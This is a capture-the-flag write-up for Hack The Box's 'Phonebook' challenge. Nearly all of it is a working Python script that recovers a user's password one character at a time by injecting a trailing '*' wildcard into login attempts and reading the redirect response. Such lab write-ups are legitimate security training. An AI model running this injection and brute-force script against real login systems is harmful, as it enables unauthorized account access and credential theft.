https://app.hackthebox.com/challenges/153

Description

Who is lucky enough to be included in the phonebook?

Exploitation

#!/usr/bin/python3
import requests,sys

if len(sys.argv) < 2:
    # The single argument is the target host (or host:port); the http:// scheme
    # and the /login path are fixed below.
    print("Usage: python script.py <url>")
    sys.exit(1)
# Account whose password field is probed; hard-coded for this challenge.
username = "reese"
login_url = f"http://{sys.argv[1]}/login"
# Candidate alphabet tried one position at a time by force_one(). Note that '*'
# is not in this set: force_one() appends it as a trailing wildcard, which only
# does anything if the backend treats '*' as match-anything in the password
# comparison (the server side is not shown here).
characters = "qwertyuiopQWERTYUIOPasdfghjklASDFGHJKLzxcvbnmZXCVBNM_-[]}{1234567890"

def create_session():
    """Return a fresh ``requests.Session`` (cookies persist across its requests)."""
    session = requests.Session()
    return session

def try_login(user, pw, session):
    """Submit one login attempt and report whether the server accepted it.

    Args:
        user: value sent in the form's ``username`` field.
        pw: value sent in the form's ``password`` field. force_one() passes a
            prefix followed by ``*``, so this is a pattern, not a literal password.
        session: the ``requests.Session`` used for the POST.

    Returns:
        True when the response carries no ``Location`` header, or one that does
        not contain ``/login``; False when the server redirected back to the
        login page (treated as a rejected attempt).
    """
    request_headers = {
        # NOTE(review): the password pattern is also mirrored into
        # X-Forwarded-For; nothing in this script shows why - confirm against
        # the target before relying on it.
        'X-Forwarded-For': pw,
        'Referer': login_url,
    }
    form = {"username": user, "password": pw}
    # Redirects are not followed so the Location header can be inspected as-is.
    response = session.post(
        login_url,
        headers=request_headers,
        data=form,
        allow_redirects=False,
    )
    # Caveat: a response with no Location header at all (e.g. an error page that
    # does not redirect) is reported as success by this check.
    location = response.headers.get('location', '')
    redirected_to_login = 'location' in response.headers and '/login' in location
    return not redirected_to_login

def force_one(prefix, session):
    """Return the next character after ``prefix`` that the server accepts.

    Each candidate from the module-level ``characters`` is appended to
    ``prefix`` together with a trailing ``*`` and submitted via try_login();
    the first accepted candidate is returned. Returns '' when none is accepted,
    which forcer() uses as its stop condition.
    """
    accepted = next(
        (
            candidate
            for candidate in characters
            if try_login(username, f"{prefix}{candidate}*", session)
        ),
        '',
    )
    return accepted

def forcer():
    """Recover the secret one character at a time, printing each prefix found.

    Stops when force_one() returns '' (no candidate accepted). There is no
    upper bound on the loop: if try_login() keeps reporting success (for
    instance when the server stops answering with a redirect to /login), the
    recovered string grows without end.
    """
    recovered = ""
    session = create_session()
    next_char = force_one(recovered, session)
    while next_char:
        recovered += next_char
        print(recovered)
        next_char = force_one(recovered, session)

# Runs on import as well as on direct execution: there is no __main__ guard.
forcer()

Summary

Phonebook: identify the broken request handling, prove control, and use it to recover the flag.